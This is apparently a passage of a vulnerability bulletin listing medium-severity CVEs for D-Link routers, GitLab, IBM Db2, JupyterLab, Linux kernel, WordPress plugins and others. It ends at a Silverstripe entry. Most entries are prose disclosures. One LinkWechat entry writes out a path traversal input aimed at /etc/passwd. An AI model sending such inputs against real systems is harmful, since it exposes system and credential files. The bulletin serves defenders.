dlink — dir-825acg1_firmware A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability. 2024-01-19 5.3 CVE-2024-0717
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
efs — easy_file_sharing_ftp_3.6
 
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559. 2024-01-19 5.3 CVE-2024-0736
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
elijahharry — hoolock
 
hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties. 2024-01-22 6.3 CVE-2024-23339
security-advisories@github.com
security-advisories@github.com
european_chemicals_agency — IUCLID
 
A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-21 4.4 CVE-2024-0770
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
factominer — factoinvestigate A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-19 6.1 CVE-2024-0720
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
flink-extended — ai-flow
 
A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file ai_flowclicommandsworkflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability. 2024-01-27 5 CVE-2024-0960
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fusionpbx — fusionpbx FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product. 2024-01-19 4.8 CVE-2024-23387
vultures@jpcert.or.jp
vultures@jpcert.or.jp
vultures@jpcert.or.jp
gitlab — gitlab
 
An issue has been discovered in GitLab CE/EE affecting all versions after 13.7 before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. Improper input sanitization of user name allows arbitrary API PUT requests. 2024-01-26 6.4 CVE-2023-5933
cve@gitlab.com
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab
 
An issue has been discovered in GitLab CE/EE affecting all versions from 12.7 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 It was possible for an attacker to trigger a Regular Expression Denial of Service via a `Cargo.toml` containing maliciously crafted input. 2024-01-26 6.5 CVE-2023-6159
cve@gitlab.com
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab
 
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. 2024-01-26 5.3 CVE-2023-5612
cve@gitlab.com
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab
 
An authorization vulnerability exists in GitLab versions 14.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. An unauthorized attacker is able to assign arbitrary users to MRs that they created within the project 2024-01-26 4.3 CVE-2024-0456
cve@gitlab.com
cve@gitlab.com
go4rayyan — scumblr A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability. 2024-01-21 6.1 CVE-2016-15037
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gravitymaster — product_enquiry_for_woocommerce The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack 2024-01-22 4.3 CVE-2023-6625
contact@wpscan.com
gravitymaster — product_enquiry_for_woocommerce The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2024-01-22 4.8 CVE-2023-6626
contact@wpscan.com
hewlett_packard_enterprise — hpe_oneview
 
HPE OneView may have a missing passphrase during restore. 2024-01-23 5.5 CVE-2023-6573
security-alert@hpe.com
hongmaple — octopus
 
A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700. 2024-01-22 6.3 CVE-2024-0784
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hongmaple — octopus
 
A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability. 2024-01-25 6.3 CVE-2024-0890
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
honojs — node-server
 
@hono/node-server is an adapter that allows users to run Hono applications on Node.js. Since v1.3.0, @hono/node-server has used its own Request object with `url` behavior that is unexpected. In the standard API, if the URL contains `..`, here called “double dots”, the URL string returned by Request will be in the resolved path. However, the `url` in @hono/node-server’s Request as does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned. This causes vulnerabilities when using `serveStatic`. Modern web browsers and a latest `curl` command resolve double dots on the client side, so this issue doesn’t affect those using either of those tools. However, problems may occur if accessed by a client that does not resolve them. Version 1.4.1 includes the change to fix this issue. As a workaround, don’t use `serveStatic`. 2024-01-22 5.3 CVE-2024-23340
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
humansignal — label-studio
 
Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. `data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited. Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page’s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. Alternatively, restrict the allowed file extensions that may be downloaded. 2024-01-24 4.7 CVE-2024-23633
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
i3thuan5 — tuitse-tsusin
 
TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation. 2024-01-23 6.1 CVE-2024-23341
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ibm — db2 IBM Db2 10.1, 10.5, and 11.1 could allow a remote user to execute arbitrary code caused by installing like named jar files across multiple databases. A user could exploit this by installing a malicious jar file that overwrites the existing like named jar file in another database. IBM X-Force ID: 249205. 2024-01-22 6.5 CVE-2023-27859
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2 IIBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270264. 2024-01-22 6.5 CVE-2023-47141
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2 IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270750. 2024-01-22 6.5 CVE-2023-47158
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2 IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272644. 2024-01-22 6.5 CVE-2023-47746
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2 IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272646. 2024-01-22 6.5 CVE-2023-47747
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2 IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 under certain circumstances could allow an authenticated user to the database to cause a denial of service when a statement is run on columnar tables. IBM X-Force ID: 273393. 2024-01-22 6.5 CVE-2023-50308
psirt@us.ibm.com
psirt@us.ibm.com
ibm — maximo_application_suite IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288. 2024-01-19 5.4 CVE-2023-32337
psirt@us.ibm.com
psirt@us.ibm.com
ibm — sterling_control_center IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874. 2024-01-19 5.3 CVE-2023-35020
psirt@us.ibm.com
psirt@us.ibm.com
ibm — storage_defender_data_protect IBM Storage Defender – Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101. 2024-01-19 5.4 CVE-2023-50963
psirt@us.ibm.com
psirt@us.ibm.com
icehrm — icehrm
 
IceHrm 23.0.0.OS does not sufficiently encode user-controlled input, which creates a Cross-Site Scripting (XSS) vulnerability via /icehrm/app/fileupload_page.php, in multiple parameters. An attacker could exploit this vulnerability by sending a specially crafted JavaScript payload and partially hijacking the victim’s browser. 2024-01-25 5.4 CVE-2023-6282
cve-coordination@incibe.es
ignazio_scimone — albo_pretorio_on_line
 
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ignazio Scimone Albo Pretorio On line.This issue affects Albo Pretorio On line: from n/a through 4.6.6. 2024-01-24 5.3 CVE-2024-22301
audit@patchstack.com
intel — HIDPevent_filter
 
Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access. 2024-01-19 6.7 CVE-2023-38541
secure@intel.com
intel — integrated_sensor_hub
 
Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access. 2024-01-19 6.7 CVE-2023-29244
secure@intel.com
intel — nuc_bios
 
Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 6.7 CVE-2023-28722
secure@intel.com
iobit — iobit_malware_fighter
 
IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver. 2024-01-22 5.5 CVE-2024-0430
help@fluidattacks.com
help@fluidattacks.com
ip2location — ip2location_country_blocker
 
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in IP2Location IP2Location Country Blocker. This issue affects IP2Location Country Blocker: from n/a through 2.33.3. 2024-01-24 5.3 CVE-2024-22294
audit@patchstack.com
ipb-halle — molecularfaces MolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles. 2024-01-19 6.1 CVE-2024-0758
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
jspxcms — jspxcms A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. 2024-01-19 6.1 CVE-2024-0721
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
juniper_networks — junos_os
 
A Missing Authentication for Critical Function vulnerability combined with a Generation of Error Message Containing Sensitive Information vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to access sensitive system information. When a user logs in, a temporary file which contains the configuration of the device (as visible to that user) is created in the /cache folder. An unauthenticated attacker can then attempt to access such a file by sending a specific request to the device trying to guess the name of such a file. Successful exploitation will reveal configuration information. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. 2024-01-25 5.3 CVE-2024-21619
sirt@juniper.net
jupyter — jupyterlab JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension. 2024-01-19 6.1 CVE-2024-22420
security-advisories@github.com
security-advisories@github.com
jupyter — jupyterlab JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix. 2024-01-19 6.5 CVE-2024-22421
security-advisories@github.com
security-advisories@github.com
kmint21 — golden_ftp_server
 
A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability. 2024-01-25 5.3 CVE-2024-0889
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lantronix — xport
 
Lantronix XPort sends weakly encoded credentials within web request headers. 2024-01-23 5.7 CVE-2023-7237
ics-cert@hq.dhs.gov
ics-cert@hq.dhs.gov
lenovo — app_store An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service. 2024-01-19 5.5 CVE-2023-6450
psirt@lenovo.com
lenovo — vantage A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges. 2024-01-19 6.8 CVE-2023-6044
psirt@lenovo.com
linecorp — line An issue in nature fitness saijo mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43988
cve@mitre.org
linecorp — line An issue in mokumoku chohu mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43989
cve@mitre.org
linecorp — line An issue in cherub-hair mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43990
cve@mitre.org
linecorp — line An issue in PRIMA CLINIC mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43991
cve@mitre.org
linecorp — line An issue in STOCKMAN GROUP mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43992
cve@mitre.org
linecorp — line An issue in smaregi_app_market mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43993
cve@mitre.org
linecorp — line An issue in Cleaning_makotoya mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43994
cve@mitre.org
linecorp — line An issue in picot.golf mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43995
cve@mitre.org
linecorp — line An issue in Q co ltd mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43996
cve@mitre.org
linecorp — line An issue in Yoruichi hobby base mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43997
cve@mitre.org
linecorp — line An issue in Books-futaba mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43998
cve@mitre.org
linecorp — line An issue in COLORFUL_laundry mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-43999
cve@mitre.org
linecorp — line An issue in Otakara lapis totuka mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-44000
cve@mitre.org
linecorp — line An issue in Ailand clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2024-01-24 5.4 CVE-2023-44001
cve@mitre.org
linux — kernel
 
A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free. 2024-01-22 6.7 CVE-2024-0775
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux — kernel
 
NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C. This issue affects Linux kernel: v2.6.12-rc2. 2024-01-25 6.3 CVE-2024-22099
security@openanolis.org
linux — kernel
 
An out-of-bounds read vulnerability was found in Netfilter Connection Tracking (conntrack) in the Linux kernel. This flaw allows a remote user to disclose sensitive information via the DCCP protocol. 2024-01-23 4 CVE-2023-39197
secalert@redhat.com
secalert@redhat.com
linux — kernel
 
Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow. 2024-01-25 4.4 CVE-2024-23307
security@openanolis.org
liuwy-dlsdys — zhglxt A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. 2024-01-19 4.8 CVE-2024-0718
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lizard-ware — spycamlizard
 
A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036. 2024-01-25 5.3 CVE-2024-0885
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
ljapps — wp_review_slider The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2024-01-22 4.8 CVE-2023-6456
contact@wpscan.com
mafiatic — blue_server
 
A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability. 2024-01-25 5.3 CVE-2024-0887
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
martinmbithi — internet_banking_system A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability. 2024-01-22 5.4 CVE-2024-0773
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
meris_wp_theme_project — meris_wp_theme The Meris WordPress theme through 1.1.2 does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2024-01-22 6.1 CVE-2023-7194
contact@wpscan.com
metagauss — eventprime The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id/event name. 2024-01-22 5.3 CVE-2023-6447
contact@wpscan.com
microsoft — microsoft_edge_(chromium-based)
 
Microsoft Edge for Android Spoofing Vulnerability 2024-01-26 5.3 CVE-2024-21387
secure@microsoft.com
microsoft — microsoft_edge_(chromium-based)
 
Microsoft Edge for Android Information Disclosure Vulnerability 2024-01-26 4.3 CVE-2024-21382
secure@microsoft.com
mintplex-labs — vector-admin
 
Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address. 2024-01-25 6.5 CVE-2024-0879
reefs@jfrog.com
reefs@jfrog.com
myeventon — rsvp_events The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin 2024-01-22 6.1 CVE-2023-7170
contact@wpscan.com
niushop — b2b2c
 
A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file appmodelUpload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 6.3 CVE-2024-0933
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
novel-plus — novel-plus
 
A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 5.5 CVE-2024-0941
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nsasoft — sharealarmpro
 
A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-22 5.3 CVE-2024-0772
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nsasoft– product_key_explorer
 
A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-21 5.3 CVE-2024-0771
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
obgm — libcoap
 
A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability. 2024-01-27 6.3 CVE-2024-0962
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
openfga — openfga
 
OpenFGA, an authorization/permission engine, is vulnerable to a denial of service attack in versions prior to 1.4.3. In some scenarios that depend on the model and tuples used, a call to `ListObjects` may not release memory properly. So when a sufficiently high number of those calls are executed, the OpenFGA server can create an `out of memory` error and terminate. Version 1.4.3 contains a patch for this issue. 2024-01-26 5.3 CVE-2024-23820
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openlibraryfoundation — mod-remote-storage Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types. 2024-01-19 5.3 CVE-2024-23685
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
owasp — dependency-check DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file. 2024-01-19 5.3 CVE-2024-23686
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
project_worlds — online_admission_system
 
A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699. 2024-01-22 6.3 CVE-2024-0783
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
qidianbang — qdbcrm
 
A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-25 4.3 CVE-2024-0880
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
qwdigital — linkwechat
 
A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: ‘../filedir’. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-25 4.3 CVE-2024-0882
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
renzo_johnson — contact_form_7_extension_for_mailchimp
 
Server-Side Request Forgery (SSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70. 2024-01-24 4.9 CVE-2024-22134
audit@patchstack.com
revenera — installshield
 
A vulnerability has been reported in Suite Setups built with versions prior to InstallShield 2023 R2. This vulnerability may allow locally authenticated users to cause a Denial of Service (DoS) condition when handling move operations on local, temporary folders. 2024-01-26 5.5 CVE-2023-29081
PSIRT-CNA@flexerasoftware.com
silverstripe — silverstripe-admin
 
